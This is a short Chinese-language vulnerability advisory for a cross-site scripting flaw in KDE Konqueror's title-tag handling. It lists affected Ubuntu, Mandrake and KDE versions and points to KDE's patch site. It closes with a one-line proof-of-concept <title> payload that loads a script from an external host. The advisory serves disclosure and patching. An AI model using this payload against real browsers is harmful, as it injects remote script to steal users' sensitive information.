Konqueror是一款多功能的浏览器,允许浏览本地和网络文件系统和全功能的WWW浏览器。
Konqueror处理WEB站点上的标题标签存在输入验证问题,远程攻击者可以利用漏洞进行跨站脚本攻击,可获得目标用户敏感信息。
构建包含恶意脚本代码的<title>标签,当Konqueror引用的时候可导致恶意脚本代码执行,可使目标用户敏感信息泄露。
Ubuntu Ubuntu Linux 5.10 sparc
Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64
Ubuntu Ubuntu Linux 6.10 sparc
Ubuntu Ubuntu Linux 6.10 powerpc
Ubuntu Ubuntu Linux 6.10 i386
Ubuntu Ubuntu Linux 6.10 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
MandrakeSoft Linux Mandrake 2007.0 x86_64
MandrakeSoft Linux Mandrake 2007.0
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 4.0
KDE Libkhtml 4.2
KDE Konqueror 3.5.2
KDE Konqueror 3.5.1
KDE Konqueror 3.3.2
KDE Konqueror 3.3.1
KDE Konqueror 3.3
KDE Konqueror 3.2.3
KDE Konqueror 3.2.2 -6
KDE Konqueror 3.2.1
KDE Konqueror 3.1.5
KDE Konqueror 3.1.4
KDE Konqueror 3.1.3
KDE Konqueror 3.1.2
KDE Konqueror 3.1.1
可参考如下补丁:
<a href=“ftp://ftp.kde.org/pub/kde/security_patches” target=“_blank”>ftp://ftp.kde.org/pub/kde/security_patches</a> :
edc2cba17795356e98eba6f3841c6277 post-3.5.6-kdelibs.diff
<title>myblog<!--</title></head><body><script
src=http://beanfuzz.com/bean.js> --></title>